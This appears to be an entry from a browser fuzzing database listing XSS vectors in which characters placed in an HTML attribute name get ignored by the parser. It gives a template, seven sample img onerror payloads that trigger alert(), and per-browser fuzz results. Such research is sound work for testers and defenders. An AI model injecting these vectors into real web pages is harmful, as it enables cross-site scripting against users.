Characters ignored in an attribute name
7
7
7
7This vector shows which characters when used as an attribute name are ignored by the HTML parser and allow the image to execute.
Created byhackvertor
Created May 28, 2024
Updated May 27, 2025
Detecting browser...
CategoryDOM Behavior
VisibilityPublic
TypeXSS
CharsetUTF-8
Template used:
<div $[chr]="><img src=x:x onerror=log($[i])>"></div>Sample payloads
<div 0x09="><img src=x:x onerror=alert(9)>"></div><div
="><img src=x:x onerror=alert(10)>"></div><div 0x0C="><img src=x:x onerror=alert(12)>"></div><div 0x0D="><img src=x:x onerror=alert(13)>"></div><div ="><img src=x:x onerror=alert(32)>"></div><div /="><img src=x:x onerror=alert(47)>"></div><div >="><img src=x:x onerror=alert(62)>"></div>Fuzz results
Chrome 145.0.0.0 desktop Windows NT 10.0
Updated17 Feb 2026
Found 7 results
Loading...
Chrome 144.0.0.0 desktop macOS 10.15.7older version
Updated17 Feb 2026
Found 7 results
Loading...
Chrome 125.0.0.0 Unknown Unknownolder version
Updated28 May 2024
Found 7 results
Loading...
Firefox 147.0 desktop Linux
Updated1 Feb 2026
Found 7 results
Loading...
Firefox 126.0 Unknown Unknownolder version
Updated28 May 2024
Found 7 results
Loading...
Microsoft Edge 144.0.0.0 desktop Windows NT 10.0
Updated31 Jan 2026
Found 7 results
Loading...
Safari 17.5 mobile iOS 17.5.1
Updated7 Jun 2024
Found 7 results
Loading...
Safari 17.4 Unknown Unknownolder version
Updated28 May 2024
Found 7 results
Loading...